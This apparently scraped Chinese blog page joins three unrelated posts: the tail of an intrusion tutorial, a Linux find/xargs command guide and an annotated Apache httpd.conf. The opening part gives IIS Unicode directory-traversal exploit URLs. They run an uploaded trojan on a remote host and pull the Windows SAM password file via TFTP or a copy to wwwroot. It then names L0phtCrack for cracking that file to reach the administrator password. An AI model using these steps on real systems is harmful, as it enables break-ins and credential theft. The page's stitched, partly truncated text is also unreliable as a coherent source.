这里的srv.exe是你想要放的木马程序。注意:要上传的文件必须和TFTP服务器在同一目录下。192.168.4.95是对方IP,192.168.4.91是自己IP。然后通过浏览器来执行这个木马:
http://192.168.4.95/scripts/..%c1%1c../win....exe?/c+srv.exe
回车后木马就在远程主机上运行了。以后能做什么事就取决于该木马的功能。
当然,也可以通过TFTP来下载,譬如说我想把它的c:\winnt\repair\SAM._文件down下来,就在浏览器里这样输入:
http://192.168.4.95/scripts/..%c1%1c../win...repair\sam
这样SAM文件就被下载到本地TFTP的同一个目录里。
当然也可以先把目标主机的SAM文件复制到c:\inetpub\wwwroot\,然后通过浏览器来下载。这样做:
http://192.168.4.95/scripts/..%c1%1c../win...2;wwwroot\
这样就把c:\winnt\repair\里的sam文件拷贝到c:\Inetpub\wwwroot\下,利用浏览器把它下载来。在地址栏里输入:
http://192.168.4.95/sam
回车后SAM文件就被下载到本地了。
然后用10phtcrack这样的工具进行破解。10phtcrack是大名鼎鼎的破NT密码的工具,成功率很高,一般的密码被破解出来只是时间长短的问题。得到管理员密码后,就可以参考前一种方法进一步入侵系统了

Linux文件查找命令find,xargs详述

By: Onlyone
14 December 2011 at 12:40

Linux文件查找命令find,xargs详述

总结:zhy2111314
来自:LinuxSir.Org
整理:北南南北
摘要: 本文是find 命令的详细说明,可贵的是针对参数举了很多的实例,大量的例证,让初学者更为容易理解;本文是zhyfly兄贴在论坛中;我对本文进行了再次整理,为方便大家阅读;
目录

+++++++++++++++++++++++++++++++++++++++++++++++++
正文
+++++++++++++++++++++++++++++++++++++++++++++++++

版权声明
本文是zhyfly兄贴在LinuxSir.Org 的一个帖子而整理出来的,如果您对版权有疑问,请在本帖后面跟帖。谢谢;本文的HTML版本由北南南北整理;修改了整篇文档的全角及说明文字中的单词中每个字母空格的问题;为标题加了编号,方便大家阅读;
前言:关于find命令
由于find具有强大的功能,所以它的选项也很多,其中大部分选项都值得我们花时间来了解一下。即使系统中含有网络文件系统( NFS),find命令在该文件系统中同样有效,只你具有相应的权限。
在运行一个非常消耗资源的find命令时,很多人都倾向于把它放在后台执行,因为遍历一个大的文件系统可能会花费很长的时间(这里是指30G字节以上的文件系统)。

一、find 命令格式

1、find命令的一般形式为;
find pathname -options [-print -exec -ok ...]

2、find命令的参数;
pathname: find命令所查找的目录路径。例如用.来表示当前目录,用/来表示系统根目录。
-print: find命令将匹配的文件输出到标准输出。
-exec: find命令对匹配的文件执行该参数所给出的shell命令。相应命令的形式为'command' {} \;,注意{}和\;之间的空格。
-ok: 和-exec的作用相同,只不过以一种更为安全的模式来执行该参数所给出的shell命令,在执行每一个命令之前,都会给出提示,让用户来确定是否执行。

3、find命令选项
-name 

按照文件名查找文件。

-perm 
按照文件权限来查找文件。

-prune 
使用这一选项可以使find命令不在当前指定的目录中查找,如果同时使用-depth选项,那么-prune将被find命令忽略。

-user 
按照文件属主来查找文件。

-group 
按照文件所属的组来查找文件。

-mtime -n +n 
按照文件的更改时间来查找文件, - n表示文件更改时间距现在n天以内,+ n表示文件更改时间距现在n天以前。find命令还有-atime和-ctime 选项,但它们都和-m time选项。

-nogroup 
查找无有效所属组的文件,即该文件所属的组在/etc/groups中不存在。

-nouser 
查找无有效属主的文件,即该文件的属主在/etc/passwd中不存在。
-newer file1 ! file2 

查找更改时间比文件file1新但比文件file2旧的文件。
-type 

查找某一类型的文件,诸如:

b - 块设备文件。
d - 目录。
c - 字符设备文件。
p - 管道文件。
l - 符号链接文件。
f - 普通文件。

-size n:[c] 查找文件长度为n块的文件,带有c时表示文件长度以字节计。
-depth:在查找文件时,首先查找当前目录中的文件,然后再在其子目录中查找。
-fstype:查找位于某一类型文件系统中的文件,这些文件系统类型通常可以在配置文件/etc/fstab中找到,该配置文件中包含了本系统中有关文件系统的信息。

-mount:在查找文件时不跨越文件系统mount点。
-follow:如果find命令遇到符号链接文件,就跟踪至链接所指向的文件。
-cpio:对匹配的文件使用cpio命令,将这些文件备份到磁带设备中。
另外,下面三个的区别:
   -amin n
  查找系统中最后N分钟访问的文件

  -atime n
  查找系统中最后n*24小时访问的文件

  -cmin n
  查找系统中最后N分钟被改变文件状态的文件

  -ctime n
  查找系统中最后n*24小时被改变文件状态的文件

    -mmin n
  查找系统中最后N分钟被改变文件数据的文件

  -mtime n
  查找系统中最后n*24小时被改变文件数据的文件

4、使用exec或ok来执行shell命令
使用find时,只要把想要的操作写在一个文件里,就可以用exec来配合find查找,很方便的
在有些操作系统中只允许-exec选项执行诸如l s或ls -l这样的命令。大多数用户使用这一选项是为了查找旧文件并删除它们。建议在真正执行rm命令删除文件之前,最好先用ls命令看一下,确认它们是所要删除的文件。
exec选项后面跟随着所要执行的命令或脚本,然后是一对儿{},一个空格和一个\,最后是一个分号为了使用exec选项,必须要同时使用print选项。如果验证一下find命令,会发现该命令只输出从当前路径起的相对路径及文件名。
例如:为了用ls -l命令列出所匹配到的文件,可以把ls -l命令放在find命令的-exec选项中
# find . -type f -exec ls -l {} \;
-rw-r--r--    1 root     root        34928 2003-02-25  ./conf/httpd.conf
-rw-r--r--    1 root     root        12959 2003-02-25  ./conf/magic
-rw-r--r--    1 root     root          180 2003-02-25  ./conf.d/README
上面的例子中,find命令匹配到了当前目录下的所有普通文件,并在-exec选项中使用ls -l命令将它们列出。
在/logs目录中查找更改时间在5日以前的文件并删除它们:
$ find logs -type f -mtime +5 -exec rm {} \;
记住:在shell中用任何方式删除文件之前,应当先查看相应的文件,一定要小心!当使用诸如mv或rm命令时,可以使用-exec选项的安全模式。它将在对每个匹配到的文件进行操作之前提示你。
在下面的例子中, find命令在当前目录中查找所有文件名以.LOG结尾、更改时间在5日以上的文件,并删除它们,只不过在删除之前先给出提示。
$ find . -name "*.conf"  -mtime +5 -ok rm {} \;
< rm ... ./conf/httpd.conf > ? n
按y键删除文件,按n键不删除。
任何形式的命令都可以在-exec选项中使用。
在下面的例子中我们使用grep命令。find命令首先匹配所有文件名为“ passwd*”的文件,例如passwd、passwd.old、passwd.bak,然后执行grep命令看看在这些文件中是否存在一个sam用户。
# find /etc -name "passwd*" -exec grep "sam" {} \;
sam:x:501:501::/usr/sam:/bin/bash

二、find命令的例子;

1、查找当前用户主目录下的所有文件:
下面两种方法都可以使用
$ find $HOME -print
$ find ~ -print


2、让当前目录中文件属主具有读、写权限,并且文件所属组的用户和其他用户具有读权限的文件;
$ find . -type f -perm 644 -exec ls -l {} \;

3、为了查找系统中所有文件长度为0的普通文件,并列出它们的完整路径;
$ find / -type f -size 0 -exec ls -l {} \;

4、查找/var/logs目录中更改时间在7日以前的普通文件,并在删除之前询问它们;
$ find /var/logs -type f -mtime +7 -ok rm {} \;

5、为了查找系统中所有属于root组的文件;
$find . -group root -exec ls -l {} \;
-rw-r--r--    1 root     root          595 10月 31 01:09 ./fie1

6、find命令将删除当目录中访问时间在7日以来、含有数字后缀的admin.log文件。
该命令只检查三位数字,所以相应文件的后缀不要超过999。先建几个admin.log*的文件 ,才能使用下面这个命令
$ find . -name "admin.log[0-9][0-9][0-9]" -atime -7  -ok rm {} \;
< rm ... ./admin.log001 > ? n
< rm ... ./admin.log002 > ? n
< rm ... ./admin.log042 > ? n
< rm ... ./admin.log942 > ? n

7、为了查找当前文件系统中的所有目录并排序;
$ find . -type d | sort

8、为了查找系统中所有的rmt磁带设备;
$ find /dev/rmt -print

三、xargs
xargs - build and execute command lines from standard input
在使用find命令的-exec选项处理匹配到的文件时, find命令将所有匹配到的文件一起传递给exec执行。但有些系统对能够传递给exec的命令长度有限制,这样在find命令运行几分钟之后,就会出现溢出错误。错误信息通常是“参数列太长”或“参数列溢出”。这就是xargs命令的用处所在,特别是与find命令一起使用。
find命令把匹配到的文件传递给xargs命令,而xargs命令每次只获取一部分文件而不是全部,不像-exec选项那样。这样它可以先处理最先获取的一部分文件,然后是下一批,并如此继续下去。
在有些系统中,使用-exec选项会为处理每一个匹配到的文件而发起一个相应的进程,并非将匹配到的文件全部作为参数一次执行;这样在有些情况下就会出现进程过多,系统性能下降的问题,因而效率不高;
而使用xargs命令则只有一个进程。另外,在使用xargs命令时,究竟是一次获取所有的参数,还是分批取得参数,以及每一次获取参数的数目都会根据该命令的选项及系统内核中相应的可调参数来确定。
来看看xargs命令是如何同find命令一起使用的,并给出一些例子。
下面的例子查找系统中的每一个普通文件,然后使用xargs命令来测试它们分别属于哪类文件
#find . -type f -print | xargs file
./.kde/Autostart/Autorun.desktop: UTF-8 Unicode English text
./.kde/Autostart/.directory:      ISO-8859 text\
......
在整个系统中查找内存信息转储文件(core dump) ,然后把结果保存到/tmp/core.log 文件中:
$ find / -name "core" -print | xargs echo "" >/tmp/core.log
上面这个执行太慢,我改成在当前目录下查找
#find . -name "file*" -print | xargs echo "" > /temp/core.log
# cat /temp/core.log
./file6
在当前目录下查找所有用户具有读、写和执行权限的文件,并收回相应的写权限:
# ls -l
drwxrwxrwx    2 sam      adm          4096 10月 30 20:14 file6
-rwxrwxrwx    2 sam      adm             0 10月 31 01:01 http3.conf
-rwxrwxrwx    2 sam      adm             0 10月 31 01:01 httpd.conf

# find . -perm -7 -print | xargs chmod o-w
# ls -l
drwxrwxr-x    2 sam      adm          4096 10月 30 20:14 file6
-rwxrwxr-x    2 sam      adm             0 10月 31 01:01 http3.conf
-rwxrwxr-x    2 sam      adm             0 10月 31 01:01 httpd.conf
用grep命令在所有的普通文件中搜索hostname这个词:
# find . -type f -print | xargs grep "hostname"
./httpd1.conf:#     different IP addresses or hostnames and have them handled by the
./httpd1.conf:# VirtualHost: If you want to maintain multiple domains/hostnames
on your
用grep命令在当前目录下的所有普通文件中搜索hostnames这个词:
# find . -name \* -type f -print | xargs grep "hostnames"
./httpd1.conf:#     different IP addresses or hostnames and have them handled by the
./httpd1.conf:# VirtualHost: If you want to maintain multiple domains/hostnames
on your
注意,在上面的例子中, \用来取消find命令中的*在shell中的特殊含义。
find命令配合使用exec和xargs可以使用户对所匹配到的文件执行几乎所有的命令。

四、find 命令的参数
下面是find一些常用参数的例子,有用到的时候查查就行了,像上面前几个贴子,都用到了其中的的一些参数,也可以用man或查看论坛里其它贴子有find的命令手册

1、使用name选项
文件名选项是find命令最常用的选项,要么单独使用该选项,要么和其他选项一起使用。
可以使用某种文件名模式来匹配文件,记住要用引号将文件名模式引起来。
不管当前路径是什么,如果想要在自己的根目录$HOME中查找文件名符合*.txt的文件,使用~作为 'pathname'参数,波浪号~代表了你的$HOME目录。
$ find ~ -name "*.txt" -print
想要在当前目录及子目录中查找所有的‘ *.txt’文件,可以用:
$ find . -name "*.txt" -print
想要的当前目录及子目录中查找文件名以一个大写字母开头的文件,可以用:
$ find . -name "[A-Z]*" -print
想要在/etc目录中查找文件名以host开头的文件,可以用:
$ find /etc -name "host*" -print
想要查找$HOME目录中的文件,可以用:
$ find ~ -name "*" -print 或find . -print
要想让系统高负荷运行,就从根目录开始查找所有的文件。
$ find / -name "*" -print
如果想在当前目录查找文件名以两个小写字母开头,跟着是两个数字,最后是.txt的文件,下面的命令就能够返回名为ax37.txt的文件:
$find . -name "[a-z][a-z][0--9][0--9].txt" -print

2、用perm选项
按照文件权限模式用-perm选项,按文件权限模式来查找文件的话。最好使用八进制的权限表示法。
如在当前目录下查找文件权限位为755的文件,即文件属主可以读、写、执行,其他用户可以读、执行的文件,可以用:
$ find . -perm 755 -print
还有一种表达方法:在八进制数字前面要加一个横杠-,表示都匹配,如-007就相当于777,-006相当于666
# ls -l
-rwxrwxr-x    2 sam      adm             0 10月 31 01:01 http3.conf
-rw-rw-rw-    1 sam      adm         34890 10月 31 00:57 httpd1.conf
-rwxrwxr-x    2 sam      adm             0 10月 31 01:01 httpd.conf
drw-rw-rw-    2 gem      group        4096 10月 26 19:48 sam
-rw-rw-rw-    1 root     root         2792 10月 31 20:19 temp

# find . -perm 006
# find . -perm -006
./sam
./httpd1.conf
./temp
-perm mode:文件许可正好符合mode
-perm +mode:文件许可部分符合mode
-perm -mode: 文件许可完全符合mode

3、忽略某个目录
如果在查找文件时希望忽略某个目录,因为你知道那个目录中没有你所要查找的文件,那么可以使用-prune选项来指出需要忽略的目录。在使用-prune选项时要当心,因为如果你同时使用了-depth选项,那么-prune选项就会被find命令忽略。
如果希望在/apps目录下查找文件,但不希望在/apps/bin目录下查找,可以用:
$ find /apps -path "/apps/bin" -prune -o -print

4、使用find查找文件的时候怎么避开某个文件目录
比如要在/usr/sam目录下查找不在dir1子目录之内的所有文件
find /usr/sam -path "/usr/sam/dir1" -prune -o -print
find [-path ..] [expression] 在路径列表的后面的是表达式
-path "/usr/sam" -prune -o -print 是 -path "/usr/sam" -a -prune -o
-print 的简写表达式按顺序求值, -a 和 -o 都是短路求值,与 shell 的 && 和 || 类似如果 -path "/usr/sam" 为真,则求值 -prune , -prune 返回真,与逻辑表达式为真;否则不求值 -prune,与逻辑表达式为假。如果 -path "/usr/sam" -a -prune 为假,则求值 -print ,-print返回真,或逻辑表达式为真;否则不求值 -print,或逻辑表达式为真。
这个表达式组合特例可以用伪码写为
if -path "/usr/sam"  then
          -prune
else
          -print
避开多个文件夹
find /usr/sam \( -path /usr/sam/dir1 -o -path /usr/sam/file1 \) -prune -o -print
圆括号表示表达式的结合。
\ 表示引用,即指示 shell 不对后面的字符作特殊解释,而留给 find 命令去解释其意义。
查找某一确定文件,-name等选项加在-o 之后
#find /usr/sam  \(-path /usr/sam/dir1 -o -path /usr/sam/file1 \) -prune -o -name "temp" -print

5、使用user和nouser选项
按文件属主查找文件,如在$HOME目录中查找文件属主为sam的文件,可以用:
$ find ~ -user sam -print
在/etc目录下查找文件属主为uucp的文件:
$ find /etc -user uucp -print
为了查找属主帐户已经被删除的文件,可以使用-nouser选项。这样就能够找到那些属主在/etc/passwd文件中没有有效帐户的文件。在使用-nouser选项时,不必给出用户名; find命令能够为你完成相应的工作。
例如,希望在/home目录下查找所有的这类文件,可以用:
$ find /home -nouser -print

6、使用group和nogroup选项
就像user和nouser选项一样,针对文件所属于的用户组, find命令也具有同样的选项,为了在/apps目录下查找属于gem用户组的文件,可以用:
$ find /apps -group gem -print
要查找没有有效所属用户组的所有文件,可以使用nogroup选项。下面的find命令从文件系统的根目录处查找这样的文件
$ find / -nogroup-print

7、按照更改时间或访问时间等查找文件
如果希望按照更改时间来查找文件,可以使用mtime,atime或ctime选项。如果系统突然没有可用空间了,很有可能某一个文件的长度在此期间增长迅速,这时就可以用mtime选项来查找这样的文件。
用减号-来限定更改时间在距今n日以内的文件,而用加号+来限定更改时间在距今n日以前的文件。
希望在系统根目录下查找更改时间在5日以内的文件,可以用:
$ find / -mtime -5 -print
为了在/var/adm目录下查找更改时间在3日以前的文件,可以用:
$ find /var/adm -mtime +3 -print

8、查找比某个文件新或旧的文件
如果希望查找更改时间比某个文件新但比另一个文件旧的所有文件,可以使用-newer选项。它的一般形式为:
newest_file_name ! oldest_file_name
其中,!是逻辑非符号。
查找更改时间比文件sam新但比文件temp旧的文件:
例:有两个文件
-rw-r--r--    1 sam      adm             0 10月 31 01:07 fiel
-rw-rw-rw-    1 sam      adm         34890 10月 31 00:57 httpd1.conf
-rwxrwxr-x    2 sam      adm             0 10月 31 01:01 httpd.conf
drw-rw-rw-    2 gem      group        4096 10月 26 19:48 sam
-rw-rw-rw-    1 root     root         2792 10月 31 20:19 temp

# find -newer httpd1.conf  ! -newer temp -ls
1077669    0 -rwxrwxr-x   2 sam      adm             0 10月 31 01:01 ./httpd.conf
1077671    4 -rw-rw-rw-   1 root     root         2792 10月 31 20:19 ./temp
1077673    0 -rw-r--r--   1 sam      adm             0 10月 31 01:07 ./fiel
查找更改时间在比temp文件新的文件:
$ find . -newer temp -print


9、使用type选项
在/etc目录下查找所有的目录,可以用:
$ find /etc -type d -print
在当前目录下查找除目录以外的所有类型的文件,可以用:
$ find . ! -type d -print
在/etc目录下查找所有的符号链接文件,可以用
$ find /etc -type l -print

10、使用size选项
可以按照文件长度来查找文件,这里所指的文件长度既可以用块(block)来计量,也可以用字节来计量。以字节计量文件长度的表达形式为N c;以块计量文件长度只用数字表示即可。
在按照文件长度查找文件时,一般使用这种以字节表示的文件长度,在查看文件系统的大小,因为这时使用块来计量更容易转换。
在当前目录下查找文件长度大于1 M字节的文件:
$ find . -size +1000000c -print
在/home/apache目录下查找文件长度恰好为100字节的文件:
$ find /home/apache -size 100c -print
在当前目录下查找长度超过10块的文件(一块等于512字节):
$ find . -size +10 -print

11、使用depth选项
在使用find命令时,可能希望先匹配所有的文件,再在子目录中查找。使用depth选项就可以使find命令这样做。这样做的一个原因就是,当在使用find命令向磁带上备份文件系统时,希望首先备份所有的文件,其次再备份子目录中的文件。
在下面的例子中, find命令从文件系统的根目录开始,查找一个名为CON.FILE的文件。
它将首先匹配所有的文件然后再进入子目录中查找。
$ find / -name "CON.FILE" -depth -print

12、使用mount选项
在当前的文件系统中查找文件(不进入其他文件系统),可以使用find命令的mount选项。
从当前目录开始查找位于本文件系统中文件名以XC结尾的文件:
$ find . -name "*.XC" -mount -print


五、关于本文
本文是find 命令的详细说明,可贵的是针对参数举了很多的实例,大量的例证,让初学者更为容易理解;本文是zhy2111314兄贴在论坛中;我对本文进行了再次整理,为方便大家阅读; ── 北南南北
六、相关文档

Linux:Apache配置文件httpd.conf详细说明

By: Onlyone
13 December 2011 at 22:53
# mime.types文件的位置(mod_mime)

<IfModule mpm_winnt_module>
TypesConfig conf/mime.types
</IfModule>
<IfModule mpm_prefork_module>
TypesConfig /etc/httpd/mime.types
</IfModule>
#检查服务器发送的 nonce 计数(尚未实现)(mod_auth_digest)
#AuthDigestNcCheck On
#为了跟踪客户端而分配的共享内存字节数(mod_auth_digest),每链接需要128字节。
AuthDigestShmemSize 25600
#禁止在内存中缓冲日志(mod_log_config)
BufferedLogs Off
#为了和RewriteMap*程序*通讯而使用的同步锁文件的名称(mod_rewrite)
#RewriteLock file-path

#为每个请求记录扩展的状态信息
ExtendedStatus On
##############################################################################
#####第二部分 主服务器配置[这些指令的作用域含同时含有"server config"和"virtual host"] 
##############################################################################
## 本配置文件将所有主机都当作虚拟主机,并不存在真正的"主服务器",因此这部分配置只
## 是所有虚拟主机的默认设置而已 ##

##### 适用于主服务器配置的核心(Core)指令 #####
#### 虚拟主机必须重新设定的指令
#文档树的根目录(没有真正的主服务器,因此不设置此值)(不能包含结尾斜杠)
#DocumentRoot directory-path
#当没有指定ServerName时,服务器会尝试对IP地址进行反向查询来推断主机名。
#所以,必须胡乱设置一个默认的主服务器主机名
ServerName xx.xx.xx.xx
#### 目录相关
#分布式配置文件的名字
AccessFileName .htaccess
#目录仅可以使用符号链接的特性
Options FollowSymLinks
#### 应答头相关
#当应答内容是text/plain或text/html时在HTTP应答头中加入的默认字符集
AddDefaultCharset utf-8
#无法由其他方法确定内容类型时,发送的默认MIME内容类型
DefaultType application/octet-stream
#禁止生成Content-MD5应答头
ContentDigest Off
#用以创建ETag应答头的文件的属性
FileETag All
#### 貌似安全相关
#仅当一个请求映射到一个真实存在的路径时才会被接受
AcceptPathInfo Off
#禁止URL中使用经过编码的路径分割符
AllowEncodedSlashes Off
#指定内部重定向和嵌套子请求的最大数量(至少是5)
LimitInternalRecursion 10
#限制客户端发送的HTTP请求体的最大字节长度(1.2M)
LimitRequestBody 1300000
#限制基于XML的请求体的最大字节长度(1.2M)
LimitXMLRequestBody 1300000

#限制apache子进程派生的进程占用CPU的最大秒数
RLimitCPU 1 1
#限制由apache子进程派生的进程占用的最大内存字节数
RLimitMEM 1 1
#限制由Apache子进程派生的进程所派生的进程数目
RLimitNPROC 0 1
#禁止生成服务器端生成文档的页脚
ServerSignature Off
#### 性能相关
#在递送中使用内存映射来读取文件(某些情况下需要禁用)
EnableMMAP On
#使用操作系统内核的sendfile支持来将文件发送到客户端
EnableSendfile On
#禁用对客户端IP的DNS查找
HostnameLookups Off
#持久链接(禁用)
KeepAlive Off
KeepAliveTimeout 1
MaxKeepAliveRequests 1
#### 错误应答与错误日志
#自定义错误响应
#400 错误的请求
ErrorDocument 400 /error/http|ErrCode=400.htm
#403 禁止访问
ErrorDocument 403 /error/http|ErrCode=403.htm
#404 未找到
ErrorDocument 404 /error/http|ErrCode=404.htm
#405 方法不被允许
ErrorDocument 405 /error/http|ErrCode=405.htm
#406 资源已经找到但MIME类型与Accpet头中所指不兼容
ErrorDocument 406 /error/http|ErrCode=406.htm
#408 在服务器许可的等待时间内客户一直没有发出任何请求
ErrorDocument 408 /error/http|ErrCode=408.htm
#409 由于请求和资源的当前状态相冲突因此不能成功(通常和PUT有关)
ErrorDocument 409 /error/http|ErrCode=409.htm
#410 所请求的文档已经不再可用而且服务器不知道应该重定向到哪一个地址
ErrorDocument 410 /error/http|ErrCode=410.htm
#411 必须发送Content-Length头否则无法处理
ErrorDocument 411 /error/http|ErrCode=411.htm
#412 指定的一些前提条件失败
ErrorDocument 411 /error/http|ErrCode=412.htm
#413 请求实体太大
ErrorDocument 413 /error/http|ErrCode=413.htm
#414 请求URI太长
ErrorDocument 414 /error/http|ErrCode=414.htm
#415 不支持的MIME类型
ErrorDocument 415 /error/http|ErrCode=415.htm
#416 Range头所请求的范围无法满足
ErrorDocument 416 /error/http|ErrCode=416.htm
#417 执行失败
ErrorDocument 417 /error/http|ErrCode=417.htm
#423 锁定的错误
ErrorDocument 423 /error/http|ErrCode=423.htm
#500 内部服务器错误
ErrorDocument 500 /error/http|ErrCode=500.htm
#501 服务器不支持实现请求所需要的功能
ErrorDocument 501 /error/http|ErrCode=501.htm
#502 服务器用作网关或代理服务器时收到了无效响应
ErrorDocument 502 /error/http|ErrCode=502.htm
#503 服务器由于维护或者负载过重暂时不能提供服务
ErrorDocument 503 /error/http|ErrCode=503.htm
#504 不能及时地从远程服务器获得应答(作为代理或网关的服务器)
ErrorDocument 504 /error/http|ErrCode=504.htm
#505 服务器不支持请求中所指明的HTTP版本
#ErrorDocument 505 /error/http|ErrCode=505.htm
#返回给客户端的错误信息中包含的管理员邮件地址
ServerAdmin [email]webmaster@oklaoshi.org[/email]
#错误日志(未使用滚动)
<IfModule mpm_winnt_module>
ErrorLog log/error.log
LogLevel info
</IfModule>
<IfModule mpm_prefork_module>
ErrorLog /var/log/httpd/error.log
LogLevel warn
</IfModule>
#### 处理器

#定位CGI脚本解释器(仅用于Win32)
ScriptInterpreterSource Script
#强制所有匹配的文件被一个指定的处理器处理
#SetHandler handler-name|None
#### 输入输出过滤器
#压缩输出所有文本内容(目前反对使用该指令,但因其简单故而使用)
AddOutputFilterByType DEFLATE application/x-javascript application/xhtml+xml application/xslt+xml application/xml application/xml-dtd text/css text/html text/plain text/richtext text/rtf text/xml
#设置处理客户端请求和POST输入时使用的过滤器
#SetInputFilter filter[;filter...]
#设置用于处理服务器输出应答的过滤器
#SetOutputFilter filter[;filter...]
#### 规范化
#使用客户端提供的主机名和端口构建自引用URL
#可以巧妙解决双线机房以及同目录多站点的问题
#还可以巧妙解决同时运行产品环境和开发环境的问题(本配置未使用该技巧)
UseCanonicalName Off
UseCanonicalPhysicalPort Off
##### 适用于主服务器配置的动态加载模(DSO)块指令 #####
#### mod_deflate ####
#用于zlib一次压缩的片断大小(字节)(20K),一般等于较大页面的大小
DeflateBufferSize 20240
#压缩程度,取值范围在 1(最低压缩率) 到 9(最高压缩率)之间
DeflateCompressionLevel 3
#在日志中将一个指示压缩率标记附加在请求之后(关闭)
#DeflateFilterNote Input instream
#DeflateFilterNote Output outstream
#DeflateFilterNote Ratio ratio
#压缩时最多可以使用多少内存(取值范围在1到9之间)
DeflateMemLevel 9
#压缩窗口的大小(取值范围在1到15之间,越大压缩效果越好)
DeflateWindowSize 15
#目录结尾斜线(/)自动补全功能(通过重定向,强烈建议打开)
#默认的目录索引文件(强烈建议按此顺序设置)
<IfModule mpm_prefork_module>
DirectorySlash On
DirectoryIndex index.html index.htm index.php
</IfModule>
<IfModule mpm_winnt_module>
DirectorySlash Off
DirectoryIndex none
</IfModule>
#### mod_env #####
#### mod_setenvif #####
#传送shell中的环境变量
#PassEnv env-variable [env-variable] ...
#强制gzip输出[建议不要这样,会让机器人头晕]
#SetEnv force-gzip 1
#删除环境变量(默认不记录任何访问日志)
UnsetEnv AccessLog
#根据客户端请求属性设置环境变量(仅记录对txt/php/html的访问)
SetEnvIf Request_URI "\.(txt|php|html?)$" AccessLog=1
##### mod_expires #####
#启用"Expires:"和"Cache-Control:"头
ExpiresActive On
#由MIME类型配置的Expires头的值
#ExpiresByType MIME-type code seconds
#默认所有文档的有效期为30天
ExpiresDefault "access plus 30 days"
#但是php文档默认不存在有效期(随后应当根据实际情况详细设置)

ExpiresActive Off
##### mod_log_config #####
#访问日志(虚拟主机+组合日志格式)(有条件的记录)
<IfModule mpm_winnt_module>
CustomLog log/access.log "%v %h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"" env=AccessLog
</IfModule>
<IfModule mpm_prefork_module>
CustomLog /var/log/httpd/access.log "%v %h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"" env=AccessLog
</IfModule>
##### mod_mime #####
#在文件扩展名与特定的编码方式之间建立映射关系
#AddEncoding MIME-enc extension [extension] ...
#将所有 .html.gz .css.gz 之类经过压缩的静态内容使用"Content-Encoding: gzip"头发送,
#这样既节约带宽又比使用mod_deflate的实时压缩节约CPU
#但只适用于静态内容并且要结合内容协商模块的类型表功能才能实现,而且不利于搜索引擎机器人收录,
#考虑到mod_expires的作用,这份配置放弃这种方法
#不过这样也可能和 AddOutputFilterByType DEFLATE .... 指令冲突,需要进一步实验或寻找其他有效方法
#AddEncoding gzip .gz
#为所有文件设定特定的默认语言(简体中文)
DefaultLanguage zh-CN
#在使用MultiViews查询所匹配的文件时要包含的文件类型
#NegotiatedOnly选项规定每个跟在基础名字后面的扩展名必须关联到一个在内容协商时已知的mod_mime扩展名,
#例如:字符集、内容类型、语言、编码方式。这是一种最严格也是副作用最少的实现方法,它是默认的处理方式。
MultiviewsMatch NegotiatedOnly
#在给定的文件扩展名与特定的字符集之间建立映射
#AddCharset charset extension [extension] ...
#在文件扩展名与特定的语言之间建立映射
#AddLanguage MIME-lang extension [extension] ...
#在文件扩展名与特定的处理器之间建立映射
#AddHandler handler-name extension [extension] ...
#在文件扩展名与特定的输入过滤器之间建立映射
#AddInputFilter filter[;filter...] extension [extension] ...
#在文件扩展名与特定的输出过滤器之间建立映射关系
#AddOutputFilter filter[;filter...] extension [extension] ...
#在给定的文件扩展名与特定的内容类型之间建立映射
#AddType MIME-type extension [extension] ...
##### mod_rewrite #####
#关闭重写引擎(不可继承,必须在每个需要的虚拟主机中单独开启)
RewriteEngine Off
#重写引擎日志的详细程度(9-最详细,0-关闭)
RewriteLogLevel 0
#强制当前配置继承其父配置(映射表、条件、规则)
#RewriteOptions inherit
#定义重写发生的条件(为了提高匹配效率)和规则(不需要考虑#..内容,因为浏览器并不发送)
RewriteCond %{REQUEST_URI} \.htm$
RewriteRule ^(.+)\.htm$ $1.php [NE,C]
RewriteRule ^([^|]+)\|(.+)\.php$ $1.php?$2 [NE,L]

#为server-info处理器显示的模块增加额外信息
#AddModuleInfo module-name string

#开启带宽限制(默认是关闭的,也就是不做任何限制)
BandWidthModule On
#强制对所有请求进行限制
ForceBandWidthModule On
#连接数上限。必须与BandWidth的子网范围对应,当然也可以不使用该指令。
MaxConnection 127.0.0.0/8 2
#带宽上限(B/s)。这里限制为16Kbps
BandWidth 127.0.0.0/8 2048
#带宽下限(B/s),设为"-1"表示仅使用上限。
MinBandWidth all -1
#将数据包分割成每小块1024字节进行延迟发送,可用值为1024-131072,默认为8192。
BandWidthPacket 1024
#将所有大于50kB的文件下载速度限制压低到8Kbps
#LargeFileLimit * 50 1024
#默认到达MaxConnection限制后将发送"503"错误代码(HTTP_SERVICE_UNAVAILABLE),
#该指令允许你自定义一个未使用的错误代码(300~599)并结合ErrorDocument指令实现自定义的错误代码说明。
#BandWidthError 510
#################################################################################
##第三部分 默认目录特性/认证/授权/访问控制[这些指令的作用域含有"directory"] #####
#################################################################################
## 默认特性穷尽限制与封闭之能事,因此必须在随后的配置中按需"放水" ##
## 此部分并不包含所有作用域含有"directory"的指令 ##
<Directory />
#禁用.htaccess文件(仅可用于目录)
AllowOverride None
#目录仅可以使用符号链接的特性(仅可用于目录)
Options FollowSymLinks
#必须同时通过认证并且满足访问控制条件
Satisfy all
#使用摘要认证
AuthType Digest
AuthDigestAlgorithm MD5
AuthDigestNonceLifetime 1200
AuthDigestQop auth
AuthDigestProvider file
AuthDefaultAuthoritative On
#所有认证共用一个用户名/密码文件
<IfModule mpm_winnt_module>
AuthUserFile conf/authn.md5
</IfModule>
<IfModule mpm_prefork_module>
AuthUserFile /etc/httpd/authn.md5
</IfModule>
AuthzUserAuthoritative On
AuthzDefaultAuthoritative On
#拒绝所有访问(mod_authz_host)
#Allow from 127.0.0.1
Deny from all
Order Allow,Deny
</Directory>
#因为在所有之后合并,所以下面可以确保拒绝访问任何"secret"目录
<DirectoryMatch /secret/>
AllowOverride None
Options FollowSymLinks
Satisfy all
Deny from all
Order Allow,Deny
</DirectoryMatch>
##下面是一段非常愚蠢的做法,完全推翻了上述默认的访问控制,因为在最后合并
##实际效果变成允许GET和POST访问一切目录和文件!!!
#
#企图仅仅允许GET和POST方法(实际上行不通)
#
# Order Allow,Deny
# Deny from all
#
#
############################################################################
#### 第四部分 默认虚拟主机[这些指令的作用域都含有"virtual host"] #####
############################################################################

#(共享服务器,存放与特定子站无关或无法在子站内部统一的内容)
#文档树根目录、主机名和别名
DocumentRoot /www/oklaoshi/www
ServerName oklaoshi.org
ServerAlias oklaoshi.net oklaoshi.com oklaoshi.cn
